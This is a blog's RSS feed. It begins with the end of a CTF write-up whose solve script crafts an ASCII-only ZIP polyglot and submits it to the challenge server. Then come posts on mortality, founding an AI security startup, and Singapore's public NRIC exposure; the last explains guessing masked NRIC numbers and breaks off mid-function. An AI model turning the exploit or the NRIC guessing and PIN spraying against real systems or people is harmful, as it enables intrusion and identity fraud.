<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">FILENAME</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># extra len</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># comment len</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># disk #</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># int attrs</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># ext attrs</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(delta)      </span><span style="color:#768390"># relative offset of LFH</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> FILENAME</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># patch CD offset to make it ASCII safe</span></span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> delta </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(lfh) </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">pad </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">while</span><span style="color:#F47067"> not</span><span style="color:#ADBAC7"> ascii_safe(cd_offset </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> pad):</span></span>
<span data-line=""><span style="color:#ADBAC7">    pad </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> 1</span></span>
<span data-line=""><span style="color:#ADBAC7">padding </span><span style="color:#F47067">=</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">'</span><span style="color:#F47067">\x00</span><span style="color:#96D0FF">'</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># end of central directory record</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_EOCD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># disk #</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># disk where CD starts</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># # entries on this disk</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># total # entries</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(cdh))  </span><span style="color:#768390"># size of central directory</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(cd_offset) </span><span style="color:#768390"># offset of CD</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">JUNK_TAIL</span><span style="color:#ADBAC7">)) </span><span style="color:#768390"># ZIP comment length</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">zip_bytes </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> lfh </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> PAYLOAD</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> padding </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> cdh </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> eocd</span></span>
<span data-line=""><span style="color:#ADBAC7">zip_bytes </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> bytearray</span><span style="color:#ADBAC7">(zip_bytes)</span></span>
<span data-line=""><span style="color:#F47067">assert</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(b </span><span style="color:#F47067">&lt;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> b </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> zip_bytes), </span><span style="color:#96D0FF">"non-ASCII byte detected!"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""><span style="color:#768390"># solve the challenge</span></span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">with</span><span style="color:#6CB6FF"> open</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"polyglot.zip"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"wb"</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">as</span><span style="color:#ADBAC7"> f:</span></span>
<span data-line=""><span style="color:#ADBAC7">    f.write(</span><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> zip_bytes </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> JUNK_TAIL</span><span style="color:#ADBAC7">.encode())</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">conn </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> remote(</span><span style="color:#96D0FF">"comments-only.chal.uiuc.tf"</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">1337</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">ssl</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">conn.sendlineafter(</span><span style="color:#96D0FF">"&gt;"</span><span style="color:#ADBAC7">, zip_bytes)</span></span>
<span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(conn.recvall().decode(</span><span style="color:#96D0FF">'latin-1'</span><span style="color:#ADBAC7">))</span></span></code></pre></figure>
<p>This gives us the flag:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="bash" data-theme="github-dark-dimmed"><code data-language="bash" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F69D50">$</span><span style="color:#96D0FF"> python3</span><span style="color:#96D0FF"> solve.py</span></span>
<span data-line=""><span style="color:#ADBAC7">[+] Opening connection to comments-only.chal.uiuc.tf on port 1337: Done</span></span>
<span data-line=""><span style="color:#ADBAC7">[+] Receiving all data: Done (</span><span style="color:#F69D50">38B</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">[</span><span style="color:#F47067">*</span><span style="color:#ADBAC7">] Closed connection to comments-only.chal.uiuc.tf port 1337</span></span>
<span data-line=""><span style="color:#F69D50"> uiuctf</span><span style="color:#96D0FF">{yeehaw_954b4b3814b22c0b4eecd}</span></span></code></pre></figure>
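<p>The offset bookkeeping in the solve script can be checked locally. The following is a minimal, self-contained sketch rather than the solve script itself: the prefix, file name, and payload are placeholder values, and <code>ascii_safe</code> is an assumption about what the helper used above does. It only forces the central directory offset to be ASCII-safe, whereas the real script also asserts that every byte of the archive is below <code>0x80</code>. It builds a stored, single-entry ZIP behind a junk prefix and reads it back with Python's <code>zipfile</code> module (Python 3.7+ for <code>bytes.isascii</code>).</p>

```python
import io
import zipfile
import zlib


def le16(x):
    return x.to_bytes(2, "little")


def le32(x):
    return x.to_bytes(4, "little")


def ascii_safe(n):
    # Assumed behaviour of the helper used above: all four
    # little-endian bytes of n must be below 0x80.
    return le32(n).isascii()


def build_prefixed_zip(prefix, name, payload):
    crc = zlib.crc32(payload)
    size = len(payload)
    delta = len(prefix)  # offsets are measured from the start of the whole file

    # Local file header: signature, five zeroed 16-bit fields
    # (version, flags, method = stored, time, date), CRC, sizes, name.
    lfh = le32(0x04034B50) + le16(0) * 5
    lfh += le32(crc) + le32(size) + le32(size)
    lfh += le16(len(name)) + le16(0) + name

    # Central directory header: six zeroed 16-bit fields, CRC, sizes,
    # name length, then extra len, comment len, disk # and int attrs.
    cdh = le32(0x02014B50) + le16(0) * 6
    cdh += le32(crc) + le32(size) + le32(size)
    cdh += le16(len(name)) + le16(0) * 4
    cdh += le32(0) + le32(delta) + name  # ext attrs, offset of LFH

    # Pad between the payload and the central directory until the
    # central directory offset encodes as ASCII-only bytes.
    cd_offset = delta + len(lfh) + size
    pad = 0
    while not ascii_safe(cd_offset + pad):
        pad += 1
    cd_offset += pad

    # End of central directory record, with an empty archive comment.
    eocd = le32(0x06054B50) + le16(0) * 2 + le16(1) * 2
    eocd += le32(len(cdh)) + le32(cd_offset) + le16(0)

    return prefix + lfh + payload + b"\x00" * pad + cdh + eocd


# Placeholder inputs: a 100-byte prefix pushes the unpadded offset to 0x8F,
# so the padding loop has to do some work.
archive = build_prefixed_zip(b"#" * 100, b"flag.txt", b"hello")
with zipfile.ZipFile(io.BytesIO(archive)) as zf:
    recovered = zf.read("flag.txt")
print(recovered)
```

<p>Because the central directory sits directly before the end-of-central-directory record and both stored offsets already include the prefix length, <code>zipfile</code> treats the result as an ordinary archive and verifies the CRC when the entry is read.</p>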
<h2>Conclusion</h2>
<p>I don't think I would have solved this challenge (or at least not as quickly) without the help of Hacktron. In general, AI helped me a lot in this CTF.
This challenge was the best example, but I also used AI to help me with:</p>
<ul>
<li>Writing exploits for the final web challenge, which hinged on an interesting side channel involving the TypeScript compiler.</li>
<li>Solving all of the cryptography challenges. Interestingly, o3 was able to one-shot them.</li>
</ul>
<p>Hacktron's flexibility was also a game changer, allowing me to quickly adapt it to my needs and get it to do exactly what I wanted. I think this is a good example of how AI can be used to augment human capabilities, and I'm excited to see how it will continue to evolve in the future.</p>
<p>In particular, I think that human pentesters and security researchers will soon be able to customise agents in very specific ways to improve their productivity, and Hacktron will be part of that. With highly performant and versatile agents that can be plugged into a wide range of existing workflows and components of the software development lifecycle, I think we will see a new era of AI-assisted security engineering.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[What would happen if I died tomorrow?]]></title>
            <link>https://www.analogue.computer/blog/died-tomorrow</link>
            <guid>https://www.analogue.computer/blog/died-tomorrow</guid>
            <pubDate>Fri, 18 Jul 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Someone asked me this question recently. Kinda morbid, but I think I was more surprised that I didn't have a good
answer.</p>
<p>Have I done enough to justify my existence? Have I been a net positive to the world? If someone erased my existence from the timeline,
would the world look any different? Would people miss me? Would I have left a legacy?</p>
<h2>Temporal discounting</h2>
<p>I think the reason this question hit me so hard is that it made me realize how large a role temporal discounting
has played in my life so far. Put simply, temporal discounting is the tendency to value immediate rewards more than future ones.
It's why we procrastinate, why we eat junk food, and why we don't save for retirement. But it's also why, for most
of my life, I didn't really think about what I was optimizing for in the long term.</p>
<p>Even as I'm now building a startup, I find myself thinking about the next few months, the next year, but it's really hard
to think about the next 10 years, or 20 years. I also kind of landed in this space by accident: at the time, I was trying
to avoid serving in the military as an infantry soldier, so I decided to apply to serve as a cybersecurity specialist instead.
I borrowed a 500-page textbook from my teacher, read it cover to cover right before the test, and somehow got in. I didn't think
that a few years later, I would be competing in the DEF CON CTF finals, or that I would be earning an income in the top 1% for my
age from freelance pentesting, or that I would be building a startup in cybersecurity.</p>
<p>Even when I ultimately went to Cambridge, I didn't really think about what that would mean for my life once I graduated.
I just had a vague idea that it would be prestigious and would unlock some doors for me. Ultimately, it did get me a prestigious
internship which I ended up not taking, and I could have just as easily started Hacktron 2 years ago without ever going to Cambridge.</p>
<p>Perhaps I wouldn't have met my current investors, or perhaps I would have met them in a different way. I wouldn't know.</p>
<h2>What to optimise for?</h2>
<p>Now that I have this realization, I think the question becomes: what do I want to optimize for? What should I be doing
so that 10 years from now, if I were to die, I would feel like I had lived a life worth living?</p>
<p>Growing up, this meant different things to me at different times. When I was younger, for the longest time,
it was about being the best at something. I refused to be average, and I guess if I had died the moment I hit my dream rank
in League of Legends, I would have felt happy with my life.</p>
<p>At some point in the past few years, it became about making money. This was kind of a means to an end, because I thought that
I wanted to buy my parents the best bungalow in Singapore and give my grandparents the best life possible. I thought if I
got the highest paying job I could, I would be happy.</p>
<p>But I think I realized that this was a bit of a dead end. Put bluntly, I see this as just rebalancing a single coordinate in the
universe — the world would be different if <em>I</em> had never existed, sure, but if you were to erase a few more people (like
my parents and grandparents) from the timeline, the world would still be the same. This was sort of the bare minimum
I could do to justify my existence as a zero-sum to the universe.</p>
<p>I think I want to optimise for scalable impact. I think there are many ways to make an outsized impact on a small number of people —
just consider how many strangers you've met in your life that have influenced you in profound ways. But I think if someone has
the ability and resources to do this on a much larger scale, they have a moral obligation to do so. I think startups are still the
best way to do this, but again, what does impact even mean? Is it small incremental improvements to the world, in which case we can
achieve a good approximation of the optimal solution with a hill climbing algorithm that chooses at each step the best local improvement?
Or is the optimal solution something that is fundamentally different, and requires careful consideration of the problem space at the very beginning
(and once you get it wrong, you can't really fix it)?</p>
<h2>2 months</h2>
<p>Even this goal is full of contradictions. If I had 2 months left to live, my priorities would likely shift dramatically
towards a local optimum — I would want to spend time with my family and aim to make an outsized impact on a few people
that I am close to.</p>
<p>Some people are just worth more than others, and I think that's okay. I told the person who asked me this question that
if they had 2 months left to live, they should spend it travelling the world, and I would drop everything to join them,
because I knew they would have done the same for me.</p>
<h2>Risk aversion</h2>
<p>I think that's part of why sometimes I find this path so scary. Prospect theory tells us that we are risk-averse when
it comes to gains, but risk-seeking when it comes to losses.</p>
<p>If I were to die tomorrow, choosing a "safer" path would mean that I would have lived a life that was less impactful,
but it would have been impactful nonetheless since I would have been able to provide for people I care about and spend
much more time with them. The risk-seeking path, on the other hand, would have had much more potential for impact, but
the losses from failure (or dying tomorrow) would have been much more pronounced.</p>
<p>But if we think about this from a rational perspective, the expected value of the risk-seeking path is still higher.
It would be really sad if I were to die tomorrow, but that's unlikely to happen. And if there's a chance that
I could do something that changes the world profoundly, then pure statistics would tell us that it's worth taking that risk.</p>
<h2>The point?</h2>
<p>I keep circling back to one question:</p>
<blockquote>
<p>How can a single life compound beyond itself?</p>
</blockquote>
<p>The answer I keep landing on is work that continues to widen its radius even when I am no longer around to steer it.
Start-ups are my chosen vehicle, but the deeper principle is leverage: building systems, tools, or ideas that unlock the efforts of thousands of others.</p>
<p>There have been some small examples of this in my life so far. One example: I started a CTF team in Singapore that became the top team in the
country for some time and qualified for a bunch of international competitions, showing many that Singaporeans can compete at the highest levels of
competitive hacking globally. I've left the team and am no longer active in CTFs, but the team is still active and the secondary effects that we created
are still being felt today.</p>
<p>Because leverage rewards patience, my best hedge against the chance of “dying tomorrow” is to live today as though I might, while still investing as though I won’t. Concretely, that means:</p>
<ol>
<li><strong>Designing for continuity</strong> — doing things with the expectation that I will not be around to see them through.</li>
<li><strong>Choosing problems with second-order effects</strong> — solving security will create a safer world that outlives me. If I ever get the opportunity though,
I want to work on climate change. That's the single biggest problem of my generation, but right now I don't have the skills or power to tackle it.</li>
<li><strong>Measuring impact the way investors track compound interest</strong> — returns are tiny at first, but they grow exponentially over time. If we do the most
locally optimal thing at every step, we will eventually get pretty far.</li>
</ol>
<p>If the experiment fails, at least I will have spent my finite hours pushing on the biggest fulcrum I was capable of finding, and sharing that journey with the people who matter most.
And if it works, the value created will dwarf anything I could have done by playing safe. Either way, the only unacceptable outcome is to leave the lever untouched.</p>
<p>So the next time someone asks what would happen if I died tomorrow, I hope the honest answer will be: <em>“Less than you’d think, because the work is built to outlive me.”</em></p>
<figure class="mx-auto"><img alt="The dream team behind Hacktron" loading="lazy" width="4032" height="3024" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fteam.b4bb8d4d.jpg&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fteam.b4bb8d4d.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">The dream team behind Hacktron</figcaption></figure>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Leaving Cambridge and co-founding Hacktron AI]]></title>
            <link>https://www.analogue.computer/blog/hacktron</link>
            <guid>https://www.analogue.computer/blog/hacktron</guid>
            <pubDate>Fri, 16 May 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<h2>TL;DR</h2>
<p>In a few weeks, I'll be leaving Cambridge and working on <a href="https://www.hacktron.ai/">Hacktron AI</a> full-time.</p>
<p>I am finishing up my second-year exams in June, after which I'll be taking time away from my studies. While I've wanted to intermit for quite some time for personal reasons, this will also allow me to focus on Hacktron AI,
which I've co-founded with <a href="https://s1r1us.ninja/">Mohan</a> and <a href="https://x.com/rootxharsh">Harsh</a>. We're the first company to be backed by <a href="https://www.projecteurope.co">Project Europe</a>, an ambitious initiative
by some of the best European founders and VCs to support the next generation of European talent in building world-class companies.</p>
<p>This is a dream come true for me in many ways.</p>
<figure class="mx-auto w-2/3"><img alt="Meme" loading="lazy" width="581" height="417" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=640&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=1200&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=1200&amp;q=75"><figcaption class="text-center">TL;DR</figcaption></figure>
<h2>Taking the leap of faith</h2>
<p>Cambridge has so far been an incredibly transformative experience, and one thing it has taught me is relentless ambition. When I first arrived, my goal was simply to prove myself and do well in
exams. In my second year, I started feeling incredibly pressured to figure out what I wanted to do with my life post-graduation. As a natural result of being surrounded by some of
the most ambitious people in the world, in the past year alone, I've found myself considering all 3 stereotypical paths for a CS student:</p>
<ol>
<li>FAANG — I got an internship offer from Amazon.</li>
<li>Quant — I turned it down for an internship at Optiver.</li>
<li>Startup — I'm ultimately turning down the internship to go all in on Hacktron AI.</li>
</ol>
<p>I think I've always been a builder at heart. And the beauty of that is that if you work hard enough, you can will ideas into existence. I just never knew that
<em>you could just do things</em> and that you didn't need to wait for "the right moment". The right moment isn't a thing, and with the rate at which the world is changing
today, there is only opportunity cost to waiting. Embracing this mindset has opened up new avenues for me, and I have some people to thank for that.</p>
<ul>
<li><a href="https://www.linkedin.com/in/max-r-103462221/">Max</a>, <a href="https://www.linkedin.com/in/dominik-diak/">Dom</a> and (another) <a href="https://www.linkedin.com/in/max-mugnaioni/">Max</a> from
<a href="https://www.joinef.com/">Entrepreneur First</a> for being some of the first people to challenge me to think critically about what I wanted to do with my life.</li>
<li><a href="https://x.com/vedaangh">Ved</a>, <a href="https://x.com/swar_ja">Swarnim</a>, and <a href="https://x.com/fogelin">Oli</a> for carrying the Cambridge builder scene with <a href="https://www.cuai.org.uk">CUAI</a>.</li>
<li><a href="https://www.fitz.cam.ac.uk/fitzelerate">Fitzelerate</a> and <a href="https://queens.shorthandstories.com/queens-entrepreneurial-society/index.html">Queens' Entrepreneurship Society</a> for
blessing me with the thrill of building and the confidence to pitch my first real project, <a href="https://www.eurekapad.app">EurekaPad</a>, which I started with <a href="https://www.linkedin.com/in/adelyn-w-a2b779228">Adelyn</a>,
<a href="https://www.linkedin.com/in/kai-xuan-lee">Kai Xuan</a>, and <a href="https://www.linkedin.com/in/sebastian-yii">Sebastian</a>.
Ultimately I felt the vision was a bit too small, and it would be nicer as a bootstrapped side project rather than a venture-scale startup.</li>
<li><a href="https://www.linkedin.com/in/joshualimyaohong">Josh</a> for bringing cool people together with <a href="https://www.cambridgeuniversityentrepreneurs.com">Cambridge University Entrepreneurs</a>.</li>
<li><a href="https://www.linkedin.com/in/euanong">Euan</a> for this <a href="https://space.ong.ac/escaping-flatland">well-written article</a> about figuring out a meaningful career path.</li>
<li>And of course, <a href="https://www.linkedin.com/in/kittymm/">Kitty</a>, <a href="https://www.linkedin.com/in/kieranleehill/">Kieran</a> and <a href="https://www.linkedin.com/in/harrystebbings">Harry</a> for being the absolute legends that they are and making Project Europe the movement that it is.</li>
</ul>
<p>I knew that once I graduated from university, settled into a job, and started having actual responsibilities, there would probably never be a chance as good as now to drop everything and
go all in on something I believe in.</p>
<p>Taking the leap of faith hasn't been easy, though. Up to this point, I think my life has been optimized around moving up the social ladder and building a better life
for myself and my family. For people like me, who have been raised in a culture where success is still largely defined by the prestige of your university and the number of
zeros in your bank account, I think being an entrepreneur is one of those things most people only fantasize about.</p>
<p>It's for that reason that I'm immensely grateful that my Asian parents have supported me every step of the way. I think on some level, they've always understood my desire for purpose.</p>
<h2>What we're building</h2>
<p>Thanks to AI, the world is writing more code than ever. Threat actors' ability to scale attacks will increase exponentially too, at a time when the number of vulnerabilities in the world
is exploding. We are building an equal and opposite force that democratizes security expertise for companies that don't have the resources or time to think deeply about security.</p>
<p>Hacktron is an autonomous security researcher that lives in every part of the software development lifecycle. It finds, triages, and fixes vulnerabilities in codebases, at a fraction of the cost of a penetration test while delivering equivalent results.</p>
<p>So far, Hacktron has:</p>
<ul>
<li>Performed an audit for <a href="https://gumroad.com/">Gumroad</a> where it autonomously identified a critical SQL injection vulnerability and several other high-severity vulnerabilities, and fixed them via pull requests.</li>
<li>Identified multiple critical vulnerabilities in open-source projects (CVEs pending).</li>
<li>Received its <a href="https://x.com/HacktronAI/status/1922528253895483618">first bounty</a> from Bugcrowd.</li>
</ul>
<p>And we're just getting started. Read more about our mission and approach on our <a href="https://www.hacktron.ai/blog">blog</a>.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[My NRIC number was public for four days. Should it have been?]]></title>
            <link>https://www.analogue.computer/blog/my-nric-number-was-public</link>
            <guid>https://www.analogue.computer/blog/my-nric-number-was-public</guid>
            <pubDate>Sun, 15 Dec 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Last Friday, I was getting off the bus in downtown Houston when I received a rather alarming message from a friend
in Singapore.</p>
<figure class="mx-auto w-2/3"><img alt="Screenshot of a message from a friend" loading="lazy" width="844" height="1276" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1920&amp;q=75"><figcaption class="text-center">That's not good...</figcaption></figure>
<p>To set the context: my National Registration Identity Card (NRIC) number, which most would consider the equivalent of a Social Security Number
in the United States or a National Insurance Number in the United Kingdom, was on a government website, accessible free
of charge to anyone who knew where to look. This was not a data breach, but <em>a feature</em> that was added to the Accounting and Corporate
Regulatory Authority (ACRA) portal, which is used by businesses to look up information about other businesses and individuals.</p>
<p>The feature was released on the 9th of December, and on the 13th of December, <a href="https://mothership.sg/2024/12/nric-numbers-publicly-listed-acra/">Mothership reported on it</a>.
You could search for the name of any person, and if they were associated with a business, their NRIC number would be displayed free of charge,
and a "full profile" with additional information, like a citizen's residential address, was for sale for S$33.</p>
<figure class="mx-auto"><img alt="Screenshot of the ACRA portal" loading="lazy" width="2035" height="1050" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=3840&amp;q=75"><figcaption class="text-center">The ACRA portal</figcaption></figure>
<p>My information was probably on there because I registered a business in Singapore a while ago which I no longer actively operate.
According to the <a href="https://www.acra.gov.sg/training-and-resources/facts-and-figures/statistical-highlights-2023">latest data</a> from ACRA,
as of the end of 2023, there were 588,764 registered businesses in Singapore, with a significant portion being owned by Singaporeans.
This means that hundreds of thousands of individuals had their NRIC numbers exposed, just like me.</p>
<p>This feature has since been disabled, but the damage has probably already been done. This was public for four days, and it is not
unreasonable to assume that someone could have scraped much of the data in that time. While this is disturbing on its own, what I'm
more concerned about is the subsequent response from the government, and the discussion around the sensitivity of NRIC numbers. I think this
is relevant to many of my readers, even if you are not from Singapore, because it involves a slightly more nuanced discussion about the
differences between security and privacy.</p>
<h2>Secret or not?</h2>
<p>Following the disabling of the feature, the Ministry of Digital Development and Information (MDDI) <a href="https://www.channelnewsasia.com/singapore/nric-numbers-masking-bizfile-acra-mddi-government-public-education-pdpa-4804801">responded to queries from the media</a>.</p>
<blockquote>
<p>MDDI said in its statement that NRIC numbers are meant to be used to identify individuals and "should be used as such".</p>
<p>"As a unique identifier, the NRIC number is assumed to be known, just as our real names are known," said the ministry.</p>
<p>"There should therefore not be any sensitivity in having one’s full NRIC number made public, in the same way that we routinely share and reveal our full names to others."</p>
<p>It added that it has been a practice for some time to use masked NRIC numbers. But there is no need to mask the number, nor is there much value in doing so, said MDDI.</p>
<p>"Using some basic algorithms, one can make a good guess at the full NRIC number from the masked number, especially if one also knows the year of birth of the person."</p>
<p>This is why public agencies are phasing out the use of masked NRIC numbers, so as to avoid giving a "false sense of security", said MDDI.</p>
</blockquote>
<p>This is an interesting perspective, which came as a shock to many. For years, the Personal Data Protection Act (PDPA) has made it illegal for
organizations to collect, use, or disclose NRIC numbers without a valid reason, with a financial penalty of up to S$1 million (although government
agencies are exempt) — this has led many to treat NRIC numbers as sensitive information that should be kept secret.</p>
<p>This means that many organizations that <em>do</em> collect NRIC numbers often use them as part of identity verification. My banking app, for example,
asks for my NRIC and a 6-digit PIN to log in. My insurance company sends me policy documents in a password-protected PDF, with part of the
password being my NRIC number. Given the current state of affairs, I'd be very concerned if my NRIC number were leaked.</p>
<p>But I'm not the person you should be worried about here. It's the people who are likely to believe the scammer on the other end of the phone who
claims to be from the government and backs that up by reciting their NRIC number. Or worse, people who set their banking PIN to contain their birth year:
this sort of feature makes it much easier to spray-and-pray NRIC and PIN combinations to gain access to someone's bank account, since the first two digits
of the NRIC number are the last two digits of the birth year for anyone born from 1968 onwards.</p>
<p>That said, it is true that full NRIC numbers are easily guessable given the masked number and the year of birth. The algorithm for calculating
the checksum (the last letter of the NRIC number) is <a href="https://www.ngiam.net/NRIC/NRIC_numbers.pdf">publicly available</a>, and the <a href="https://en.wikipedia.org/wiki/National_Registration_Identity_Card#Structure_of_the_NRIC_number.2FFIN">structure</a>
of the NRIC number is well-known. But I imagine that for many, the contention is not about whether the NRIC is masked or not, but about whether
it should be public at all. For instance, one might feel slightly safer disclosing only the street they live on, rather than their full address,
but that doesn't mean they should be comfortable with their street address being publicly searchable by anyone on the internet.</p>
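<p>To make the guessing argument concrete, here is a minimal Python sketch of the checksum as it is commonly documented for S- and T-series numbers: weights 2, 7, 6, 5, 4, 3, 2, an offset of 4 for the T series, and a lookup table indexed by the sum modulo 11. The function names and the masked format (only the last three digits and the letter visible) are assumptions for illustration, and the sample value is the widely used placeholder <code>S1234567D</code>, not a real person's number.</p>

```python
# Sketch of the publicly documented checksum for S- and T-series NRIC numbers.
# Helper names and the masked format below are illustrative assumptions.
WEIGHTS = (2, 7, 6, 5, 4, 3, 2)
LETTERS = "JZIHGFEDCBA"  # indexed by (weighted sum + offset) mod 11


def checksum_letter(prefix: str, digits: str) -> str:
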